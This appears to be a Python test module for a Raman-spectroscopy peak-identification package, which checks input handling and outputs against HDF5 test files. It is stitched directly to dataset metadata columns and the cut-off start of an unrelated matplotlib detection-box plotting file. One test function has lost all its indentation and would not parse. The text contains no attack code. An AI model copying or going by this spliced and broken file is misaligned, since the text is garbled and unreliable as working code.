    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
    unknown_y = list(exphdf5['{}/counts'.format(key)])
    unknown_x = np.asarray(unknown_x)
    unknown_y = np.asarray(unknown_y)
    known_compound_list = list(calhdf5.keys())
    precision = 10
    known_peaks = []
    known_peaks_list = []
    unknown_peaks = []
    # Peak datasets are named Peak_01 .. Peak_NN; the zero-padded form is
    # only used for the first nine.
    for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
        if i < 9:
            unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
        else:
            unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
    for i, _ in enumerate(known_compound_list):
        for _, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
            known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
                                                                peak)])[0][2])
        known_peaks.append(known_peaks_list[i])
    peakidentify.compare_unknown_to_known(unknown_peaks, known_peaks, precision)
    try:
        peakidentify.compare_unknown_to_known(1, known_peaks, precision)
    except TypeError:
        print("An invalid unknown_peaks value was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.compare_unknown_to_known(unknown_peaks, 'known_peaks', precision)
    except TypeError:
        print("An invalid known_peaks value was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.compare_unknown_to_known(unknown_peaks, known_peaks, 'precision')
    except TypeError:
        print("An invalid precision value was passed to the function, and "
              "was handled correctly.")
    #After testing for resilience to unexpected inputs, now ensure
    #outputs are performing correctly
    #First, make sure function is returning the list.
    assert isinstance(peakidentify.compare_unknown_to_known(
        unknown_peaks, known_peaks, precision), np.ndarray), ("""Function
        is not returning list""")
    #Compare one set of peaks to itself. The full association matrix
    #should have all values = 1.
    self_comp = np.mean(peakidentify.compare_unknown_to_known(known_peaks,
                                                              known_peaks,
                                                              precision))
    assert self_comp == 1, ("Peak Assignment Error. Comparison of compound "
                            "against itself should find all peaks.")
    dif_comp = np.mean(peakidentify.compare_unknown_to_known([1, 3, 6],
                                                             [1000, 2000, 5000],
                                                             precision))
    assert dif_comp == 0, ("Peak Assignment Error. Passed values should "
                           "have no matching assignments.")
    calhdf5.close()
    exphdf5.close()
def test_peak_position_comparisons():
    """
    This function tests the operation of the peak_position_comparisons
    function in peakidentify. Said function returns a list of strings that
    contain text assignments of each peak in the unknown spectrum.
    """
    #First, generate a testing dataset.
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
    unknown_y = list(exphdf5['{}/counts'.format(key)])
    unknown_x = np.asarray(unknown_x)
    unknown_y = np.asarray(unknown_y)
    known_compound_list = list(calhdf5.keys())
    precision = 10
    known_peaks = []
    known_peaks_list = []
    association_matrix = []
    unknown_peaks = []
    # Peak datasets are named Peak_01 .. Peak_NN; the zero-padded form is
    # only used for the first nine.
    for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
        if i < 9:
            unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
        else:
            unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
    known_peaks = []
    known_peaks_list = []
    num_peaks_list = []
    association_matrix = []
    split__index_list = []
    for i, _ in enumerate(known_compound_list):
        num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
        split__index_list.append(sum(num_peaks_list))
        for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
            # Need to separate known peaks to make a list of two separate lists
            # to perform custom list split using list comprehension + zip()
            # and split_index_list
            known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
                                                                peak)])[0][2])
        # NOTE(review): the comprehension targets below shadow the loop
        # variables i and j (scoped to the comprehension in Python 3).
        result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
                                                          split__index_list +
                                                          [None])]
        known_peaks.append(result)
        association_matrix.append(peakidentify.compare_unknown_to_known(
            unknown_peaks, known_peaks[i][i], precision))
    peakidentify.peak_position_comparisons(unknown_peaks, known_peaks,
                                           association_matrix,
                                           hdf5_calfilename)
    #Then, test error handling of bad inputs for the function.
    try:
        peakidentify.peak_position_comparisons(1, known_peaks,
                                               association_matrix,
                                               hdf5_calfilename)
    except TypeError:
        print("An invalid unknown_peaks value was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.peak_position_comparisons(unknown_peaks,
                                               'known_peaks',
                                               association_matrix,
                                               hdf5_calfilename)
    except TypeError:
        print("An invalid known_peaks value was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.peak_position_comparisons(unknown_peaks,
                                               known_peaks,
                                               'association_matrix',
                                               hdf5_calfilename)
    except TypeError:
        print("An invalid association_matrix value was passed to the function,"
              "and was handled correctly.")
    #Check to make sure the function is returning a list.
    assert isinstance(peakidentify.peak_position_comparisons(
        unknown_peaks, known_peaks,
        association_matrix, hdf5_calfilename), list), """The function is
        not returning a list."""
    #Test a call that says that no peaks have associations
    association_matrix_0 = []
    association_matrix_0.append(peakidentify.compare_unknown_to_known(
        known_peaks[0][0],
        known_peaks[1][0],
        precision))
    zero_output = peakidentify.peak_position_comparisons(known_peaks[0][0],
                                                         [known_peaks[1][0]],
                                                         association_matrix_0,
                                                         hdf5_calfilename)[0]
    assert zero_output[0] == 'FormicAcid', """The function is not properly
        handling unassigned peaks."""
    #Test the function to make sure that it has the right functionality
    association_matrix = []
    #Generate a matrix with all associations equal to 1
    association_matrix.append(peakidentify.compare_unknown_to_known(
        known_peaks[0][0],
        known_peaks[0][0],
        precision))
    #change the middle index to 0
    association_matrix[0][1] = 0
    test_peak_labels = peakidentify.peak_position_comparisons(known_peaks[0][0],
                                                              [known_peaks[0][0]],
                                                              association_matrix,
                                                              hdf5_calfilename)
    print(test_peak_labels[0][0])
    print(test_peak_labels[1][0])
    assert test_peak_labels[0][0] == 'FormicAcid', """The funciton is
        not correctly assigning peaks when association matrix = 1"""
    assert test_peak_labels[1][0] == 'Unassigned', """The function is
        not correctly handling a lack of peak assignments"""
    calhdf5.close()
    exphdf5.close()
def test_percentage_of_peaks_found():
    """
    This function tests the operation of the
    percentage_of_peaks_found function in peakidentify.py
    """
    #First, generate a testing dataset.
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
    unknown_y = list(exphdf5['{}/counts'.format(key)])
    unknown_x = np.asarray(unknown_x)
    unknown_y = np.asarray(unknown_y)
    known_compound_list = list(calhdf5.keys())
    precision = 10
    unknown_peaks = []
    # Peak datasets are named Peak_01 .. Peak_NN; the zero-padded form is
    # only used for the first nine.
    for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
        if i < 9:
            unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
        else:
            unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
    known_peaks = []
    known_peaks_list = []
    num_peaks_list = []
    association_matrix = []
    split__index_list = []
    for i, _ in enumerate(known_compound_list):
        num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
        split__index_list.append(sum(num_peaks_list))
        for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
            # Need to separate known peaks to make a list of two separate lists
            # to perform custom list split using list comprehension + zip()
            # and split_index_list
            known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
                                                                peak)])[0][2])
        result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
                                                          split__index_list +
                                                          [None])]
        known_peaks.append(result)
        association_matrix.append(peakidentify.compare_unknown_to_known(
            unknown_peaks, known_peaks[i][i], precision))
    #Test for input error handling.
    peakidentify.percentage_of_peaks_found(known_peaks, association_matrix,
                                           hdf5_calfilename)
    try:
        peakidentify.percentage_of_peaks_found([[0], [1], [2], [3], [4],
                                                [5],[6],[7],[8],[9]],
                                               association_matrix,
                                               hdf5_calfilename)
    except TypeError:
        print("""The function correctly handled the error when a list of ints
        was input instead of the known_peaks list""")
    try:
        peakidentify.percentage_of_peaks_found(1, association_matrix,
                                               hdf5_calfilename)
    except TypeError:
        print("""The function correctly handled the error when an int
        was input instead of the known_peaks list""")
    try:
        peakidentify.percentage_of_peaks_found(known_peaks, 1,
                                               hdf5_calfilename)
    except TypeError:
        print("""The function correctly handled the error when an int
        was input instead of the association matrix""")
    #Test to make sure function returns a dictionary.
    assert isinstance(peakidentify.percentage_of_peaks_found(
        known_peaks,
        association_matrix,
        hdf5_calfilename), dict), """The function is not
        returning a dictionary."""
    #Test for function output.
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    acet_peaks = []
    key = 'acetaldehyde'
    for _, peak in enumerate(list(calhdf5[key])[:-3]):
        acet_peaks.append(list(calhdf5['{}/{}'.format(key, peak)])[0][2])
    print(acet_peaks)
    # An all-zero association matrix should report 0% of peaks found.
    acet_dict_0 = peakidentify.percentage_of_peaks_found([acet_peaks, [0], [0], [0],
                                                          [0], [0], [0],
                                                          [0], [0], [0]],
                                                         [[0, 0, 0, 0, 0, 0, 0, 0],
                                                          [0], [0], [0],
                                                          [0], [0], [0],
                                                          [0], [0], [0]],
                                                         hdf5_calfilename)
    assert acet_dict_0[key] == 0, """The function is not correctly
        calculating percentages when no peaks are found"""
    # An all-one association matrix should report 100% of peaks found.
    acet_dict_1 = peakidentify.percentage_of_peaks_found([acet_peaks, [1], [1], [1],
                                                          [1], [1], [1], [1], [1], [1]],
                                                         [[1, 1, 1, 1, 1, 1, 1, 1],
                                                          [1], [1], [1],
                                                          [1], [1], [1], [1], [1], [1]],
                                                         hdf5_calfilename)
    assert acet_dict_1[key] == 100, """The function is not correctly
        calculating percentages when all peaks are found"""
    calhdf5.close()
    exphdf5.close()
    # make assertions
def test_plotting_peak_assignments():
"""
This function tests the operation of the peak_assignment
function in peakidentify.py
"""
#First, generate a testing dataset.
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
known_peaks = []
known_peaks_list = []
num_peaks_list = []
association_matrix = []
split__index_list = []
for i, _ in enumerate(known_compound_list):
num_peaks_list.append(len(list(calhdf5[known_compound_list[i]])[:-3]))
split__index_list.append(sum(num_peaks_list))
for j, peak in enumerate(list(calhdf5[known_compound_list[i]])[:-3]):
# Need to separate known peaks to make a list of two separate lists
# to perform custom list split using list comprehension + zip()
# and split_index_list
known_peaks_list.append(list(calhdf5['{}/{}'.format(known_compound_list[i],
peak)])[0][2])
result = [known_peaks_list[i : j] for i, j in zip([0] + split__index_list,
split__index_list +
[None])]
known_peaks.append(result)
association_matrix.append(peakidentify.compare_unknown_to_known(
unknown_peaks, known_peaks[i][i], precision))
#Ok, so that generates a full association matrix that contains everything
#we need to assign peaks.
#Now, let's go through and actually assign text to peaks.
unknown_peak_assignments = peakidentify.peak_position_comparisons(
unknown_peaks, known_peaks, association_matrix, hdf5_calfilename)
peak_labels = []
for i, _ in enumerate(unknown_peak_assignments):
peak_labels.append(str(unknown_peak_assignments[i]))
#Test for input error handling.
peakidentify.plotting_peak_assignments(unknown_x, unknown_y, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
try:
peakidentify.plotting_peak_assignments(1, unknown_y, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error
when an int was input instead of the unknown_x list""")
try:
peakidentify.plotting_peak_assignments(unknown_x, 3, unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the unknown_y list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
'unknown_peaks',
unknown_peak_assignments,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when a string
was input instead of the unknown_peaks list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
3,
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the error when an int
was input instead of the unknown_peak_assignments""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
['WATER', 23, 'CO'],
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the unknown_peak_assignment list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
['H', 23, 'CO2'],
hdf5_expfilename,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the unknown_peak_assignment list""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
unknown_peak_assignments,
3,
hdf5_calfilename,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the hdf5_filename""")
try:
peakidentify.plotting_peak_assignments(unknown_x,
unknown_y,
unknown_peaks,
unknown_peak_assignments,
hdf5_expfilename,
3,
key, peak_labels,
plot = False)
except TypeError:
print("""The function correctly handled the case when an int
was passed in the hdf5_calfilename""")
calhdf5.close()
exphdf5.close()
def test_add_label():
    """
    Function that adds a label to a peak dataset in the hdf5 file
    """
    key = '300C/25s'
    peak = 'Peak_01'
    label = '[Hydrogen]'
    hdf5 = h5py.File(hdf5_filename, 'r+')
    data = peakidentify.add_label(hdf5_filename, key, peak, label)
    # make assertions on the returned dataframe and the stored dataset
    dataset = hdf5['{}/{}'.format(key, peak)]
    assert len(data) == 8,'incorrect length of dataframe'
    assert list(dataset)[0][-1] == '[Hydrogen]','Wrong string output'
    assert isinstance(dataset[0],np.void), """incorrect key/peak
    formatting with hdf5 file"""
    assert isinstance(data,pd.DataFrame), 'incorrect output type'
    # Feed one invalid argument at a time; each call must raise TypeError.
    bad_calls = [
        ('hdf5_filename', ('hdf5_filename', key, peak, label)),
        ('key', (hdf5_filename, 3, peak, label)),
        ('peak', (hdf5_filename, key, 3, label)),
        ('label', (hdf5_filename, key, peak, 3)),
    ]
    for arg_name, call_args in bad_calls:
        try:
            peakidentify.add_label(*call_args)
        except TypeError:
            print("An invalid {} was passed to the function, ".format(arg_name)
                  + "and it was handled well with a TypeError.")
    hdf5.close()
def test_peak_1d_score():
    """
    Evaluates the functionality of the peak_1D_score function
    """
    # Initialize the test arguments
    row_i = [0, 1]
    row_j = [2, 1]
    rowcat = row_i + row_j
    arraya = np.array([[0, 1], [2, 1], [0, 3]])
    arraycat = np.concatenate((arraya[0], arraya[2]))
    precision = 10
    # A negative scoremax is invalid for both list and array inputs;
    # each call must raise ValueError.
    for left, right in ((row_i, row_j), (arraya[0], arraya[2])):
        try:
            peakidentify.peak_1d_score(left, right, -1, precision)
        except ValueError:
            print("An invalid scoremax value was passed to the function, "
                  "and was handled correctly.")
    # Running a good example
    testscore = peakidentify.peak_1d_score(row_i, row_j, 1., precision)
    arrayscore = peakidentify.peak_1d_score(arraya[0], arraya[2], 1, precision)
    # make assertions
    assert len(row_i) == len(row_j), 'Input lengths do not match'
    assert len(arrayscore[0][:]) == len(arraycat), """Output list length
    different than concatenated lists length"""
    # Every score must be a normalized value in [0, 1].
    for idx in range(len(rowcat)):
        assert 0 <= testscore[0][idx] <= 1, 'Output value outside acceptable range'
        assert 0 <= arrayscore[0][idx] <= 1, 'Output value outside acceptable range'
def test_score_max():
    """
    Evaluates the functionality of the score_max function
    """
    # Initialize the test arguments
    k = 2
    row_i = [0, 3]
    row_j = [2, 1]
    rowcat = row_i + row_j
    arraya = np.array([[0, 1], [2, 1], [0, 3]])
    precision = 10
    arraycat = np.concatenate((arraya[0], arraya[1]))
    # Run Function for lists
    # A negative k is invalid; score_max is expected to raise ValueError.
    try:
        maxscores = peakidentify.score_max(row_i, row_j, -1, precision)
    except ValueError:
        print("An invalid k value was passed to the function, "
              "and was handled correctly.")
    # Run Function for arrays
    try:
        arrmaxscores = peakidentify.score_max(arraya[0], arraya[1], -1, precision)
    except ValueError:
        print("An invalid k value was passed to the function, "
              "and was handled correctly.")
    # Run good examples
    maxscores = peakidentify.score_max(row_i, row_j, k, precision)
    arrmaxscores = peakidentify.score_max(arraya[0], arraya[1], k, precision)
    # make assertions
    assert len(arrmaxscores[0]) == len(arraycat), """Output list length different
    than concatenated lists length"""
    # Scores scaled by k=2 must stay within [0, 2].
    for i, _ in enumerate(rowcat):
        assert 0 <= arrmaxscores[0][i] <= 2, 'Output value outside acceptable range'
        assert 0 <= maxscores[0][i] <= 2, 'Output value outside acceptable range'
    # NOTE(review): this loop iterates over the outer maxscores container
    # (enumerate starting at 1) while indexing maxscores[0]; it appears to
    # check every entry against the last one — confirm the intended bound.
    for i, _ in enumerate(maxscores, 1):
        assert maxscores[0][i-1] >= maxscores[0][-1], """Output values are
        less than the max value"""
def test_score_sort():
    """
    Evaluates the functionality of the score_sort function
    """
    # Initialize the test arguments
    row_i = [0, 1]
    row_j = [2, 1]
    rowcat = row_i + row_j
    arraya = np.array([[0, 1], [2, 1], [0, 3]])
    k = 2
    precision = 10
    arraycat = np.concatenate((arraya[0], arraya[1]))
    # Run Previous Function to get max score normalization
    maxscores = peakidentify.score_max(row_i, row_j, k, precision)
    # Run Function for lists
    # max(maxscores[0]) here is not cast to int; a TypeError is expected.
    try:
        sortedscores = peakidentify.score_sort(row_i, row_j, max(maxscores[0]), precision)
    except TypeError:
        print("An invalid maxscores from score_max was passed to the function, "
              "and was handled correctly.")
    # Run Function for arrays
    try:
        arrsortedscores = peakidentify.score_sort(arraya[0], arraya[1],
                                                  max(maxscores[0]),
                                                  precision)
    except TypeError:
        print("An invalid maxscores from score_max was passed to the function, "
              "and was handled correctly.")
    # Run good examples
    # score_sort requires an integer maxscore, hence the explicit int() casts.
    sortedscores = peakidentify.score_sort(row_i, row_j,
                                           int(max(maxscores[0])),
                                           precision)
    arrsortedscores = peakidentify.score_sort(arraya[0], arraya[1],
                                              int(max(maxscores[0])),
                                              precision)
    # make assertions
    assert len(arraycat) == len(arrsortedscores[0][0]), """Output list length
    different than concatenated lists length"""
    assert len(rowcat) == len(sortedscores[0][0]), """Output list length
    different than concatenated lists length"""
    # NOTE(review): the loop bound comes from the outer sortedscores
    # container, not from the inner score list that is indexed with [i+1];
    # confirm this matches the intended adjacent-pair ordering check.
    for i, _ in enumerate(sortedscores):
        assert sortedscores[0][0][i] <= sortedscores[0][0][i+1], """Output values
        is sorted from smallest to largest"""
        assert arrsortedscores[0][0][i] <= arrsortedscores[0][0][i+1], """Output
        values is sorted from smallest to largest"""
def test_process_score():
    """
    Evaluates the functionality of the process_score function
    and the input type errors are handled.

    Improvements over the original: removed unused locals (unknown_x,
    unknown_y, known_compound_list), the duplicate `precision = 10`
    assignment, and the redundant bare `return`; the Peak_0N / Peak_NN
    naming branch is replaced with a single zero-padded format.
    """
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    precision = 10
    key5 = 'water'
    # Experimental peak centers; peak datasets are named Peak_01, Peak_02, ...
    # so {:02d} reproduces the zero padding for single-digit indices.
    unknown_peaks = []
    for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
        unknown_peaks.append(
            list(exphdf5['{}/Peak_{:02d}'.format(key, i + 1)])[0][2])
    # Calibration (water) peak centers.
    H2O_peaks = []
    for peak in list(calhdf5[key5])[:-3]:
        H2O_peaks.append(list(calhdf5['{}/{}'.format(key5, peak)])[0][2])
    unknownname = 'Formic3.6wt%'
    knownname = 'water'
    k = 1
    # run good examples
    peakidentify.process_score(unknown_peaks, H2O_peaks, k, precision, unknownname, knownname)
    # run bad inputs: each call swaps one argument for an invalid type and
    # must be rejected with a TypeError.
    try:
        peakidentify.process_score('unknown_peaks', H2O_peaks, k, precision, unknownname, knownname)
    except TypeError:
        print("An invalid unknown_peaks from process_score was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.process_score(unknown_peaks, 'known_peaks', k, precision, unknownname, knownname)
    except TypeError:
        print("An invalid known_peaks from process_score was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.process_score(unknown_peaks, H2O_peaks, 'k', precision, unknownname, knownname)
    except TypeError:
        print("An invalid k value from process_score was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.process_score(unknown_peaks, H2O_peaks, k, 'precision', unknownname, knownname)
    except TypeError:
        print("An invalid precision from process_score was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.process_score(unknown_peaks, H2O_peaks, k, precision, 3, knownname)
    except TypeError:
        print("An invalid unknownname from process_score was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.process_score(unknown_peaks, H2O_peaks, k, precision, unknownname, 3)
    except TypeError:
        print("An invalid knownname from process_score was passed to the function, "
              "and was handled correctly.")
    calhdf5.close()
    exphdf5.close()
def test_score_table():
    """
    Evaluates the functionality of the score_table function
    and the input type errors are handled.

    Improvements over the original: removed unused locals (unknown_x,
    unknown_y, known_compound_list) and the duplicate `precision = 10`;
    fixed the first error message, which said "score_max" instead of
    "score_table"; replaced the Peak_0N branch with a zero-padded format.
    """
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    precision = 10
    key5 = 'water'
    # Experimental peak centers; datasets are zero-padded (Peak_01, ...).
    unknown_peaks = []
    for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
        unknown_peaks.append(
            list(exphdf5['{}/Peak_{:02d}'.format(key, i + 1)])[0][2])
    # Calibration (water) peak centers.
    H2O_peaks = []
    for peak in list(calhdf5[key5])[:-3]:
        H2O_peaks.append(list(calhdf5['{}/{}'.format(key5, peak)])[0][2])
    unknownname = 'Formic3.6wt%'
    knownname = 'H2O'
    # run good examples
    peakidentify.score_table(unknown_peaks, H2O_peaks, precision, unknownname, knownname)
    # run bad inputs: each call swaps one argument for an invalid type and
    # must be rejected with a TypeError.
    try:
        peakidentify.score_table('unknown_peaks', H2O_peaks, precision, unknownname, knownname)
    except TypeError:
        print("An invalid unknown_peaks from score_table was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.score_table(unknown_peaks, 'H2O_peaks', precision, unknownname, knownname)
    except TypeError:
        print("An invalid known_peaks from score_table was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.score_table(unknown_peaks, H2O_peaks, 'precision', unknownname, knownname)
    except TypeError:
        print("An invalid precision from score_table was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.score_table(unknown_peaks, H2O_peaks, precision, 3, knownname)
    except TypeError:
        print("An invalid unknownname from score_table was passed to the function, "
              "and was handled correctly.")
    try:
        peakidentify.score_table(unknown_peaks, H2O_peaks, precision, unknownname, 3)
    except TypeError:
        print("An invalid knownname from score_table was passed to the function, "
              "and was handled correctly.")
    calhdf5.close()
    exphdf5.close()
# NOTE(review): these trailing close() calls duplicate the closes already
# performed inside the test functions above, and `hdf5` is not defined at
# this scope in the visible chunk — confirm they are not leftover residue.
exphdf5.close()
calhdf5.close()
hdf5.close()
| 41.697326
| 98
| 0.567343
| 4,202
| 38,987
| 5.071633
| 0.070919
| 0.027685
| 0.036601
| 0.021022
| 0.8444
| 0.818216
| 0.787105
| 0.769696
| 0.720801
| 0.720801
| 0
| 0.02541
| 0.338831
| 38,987
| 935
| 99
| 41.697326
| 0.801335
| 0.080463
| 0
| 0.728716
| 0
| 0
| 0.206472
| 0.034075
| 0
| 0
| 0
| 0
| 0.037518
| 1
| 0.015873
| false
| 0.053391
| 0.008658
| 0
| 0.025974
| 0.066378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1dda2191697baa3f7dfbb1fb8b1423c88080dc9b
| 10,102
|
py
|
Python
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 103
|
2019-08-16T11:55:04.000Z
|
2022-03-04T16:47:57.000Z
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 33
|
2019-05-25T08:42:06.000Z
|
2022-03-08T21:32:10.000Z
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 18
|
2019-09-14T07:35:39.000Z
|
2021-11-25T04:25:20.000Z
|
# --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2017 Microsoft
# Copyright (c) 2019 IBM Corp
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Written by Yi Li, Haocheng Zhang
# --------------------------------------------------------
import matplotlib.pyplot as plt
import warnings
import matplotlib.cbook
# Silence matplotlib deprecation warnings emitted via matplotlib.cbook.
warnings.filterwarnings("ignore",category=matplotlib.cbook.mplDeprecation)
# Use the non-interactive Agg backend so figures can be saved without a display.
plt.switch_backend('agg')
from random import random as rand
def show_detsB_gt_boxes(im, dets_B, gt_boxes, gt_classes, scale = 1.0, save_file_path='temp_det_gt.png'):
    """Plot labeled detections (left subplot) next to ground-truth boxes (right).

    Args:
        im: image array to display.
        dets_B: iterable of detections; each entry holds the box row at [0]
            (format [x1, y1, x2, y2, score]) and the category name at [1].
        gt_boxes: ground-truth boxes aligned with gt_classes.
        gt_classes: class names for the ground-truth boxes.
        scale: multiplier applied to detection coordinates.
        save_file_path: output path for the rendered figure.

    Fix: removed the function-local `import matplotlib.pyplot as plt` and
    `from random import random as rand` that redundantly shadowed the
    module-level imports.
    """
    fig = plt.figure(1)
    FS = 22  # label font size
    fig.set_size_inches((2 * 8.5, 1 * 11), forward=False)
    plt.subplot(121)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for det in dets_B:
        det_row = det[0]
        # NOTE(review): the name is read from det[1] here but from det[2]
        # in show_detsB_boxes — confirm which record layout callers use.
        cat_name = det[1]
        bbox = det_row[:4] * scale
        color = (rand(), rand(), rand())
        rect = plt.Rectangle((bbox[0], bbox[1]),
                             bbox[2] - bbox[0],
                             bbox[3] - bbox[1], fill=False,
                             edgecolor=color, linewidth=3.5)
        plt.gca().add_patch(rect)
        score = det_row[-1]
        plt.gca().text(bbox[0], bbox[1],
                       '{:s} {:.3f}'.format(cat_name, score),
                       bbox=dict(facecolor=color, alpha=0.5), fontsize=FS, color='white')
    plt.subplot(122)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for cls_idx, cls_name in enumerate(gt_classes):
        bbox = gt_boxes[cls_idx]
        color = (rand(), rand(), rand())
        rect = plt.Rectangle((bbox[0], bbox[1]),
                             bbox[2] - bbox[0],
                             bbox[3] - bbox[1], fill=False,
                             edgecolor=color, linewidth=3.5)
        plt.gca().add_patch(rect)
        plt.gca().text(bbox[0], bbox[1],
                       '{:s}'.format(cls_name),
                       bbox=dict(facecolor=color, alpha=0.5), fontsize=FS, color='white')
    # Remove all margins so the saved image is just the plotted content.
    plt.gca().set_axis_off()
    plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
                        hspace=0, wspace=0)
    plt.margins(0, 0)
    fig.savefig(save_file_path, bbox_inches = 'tight', pad_inches = 0)
    plt.close(fig)
def show_detsB_boxes(im, dets_B, scale = 1.0, save_file_path='temp.png'):
    """Draw labeled detection boxes on an image and save the figure.

    Args:
        im: image array to display.
        dets_B: iterable of detections; each entry holds the box row at [0]
            (format [x1, y1, x2, y2, score]) and the category name at [2].
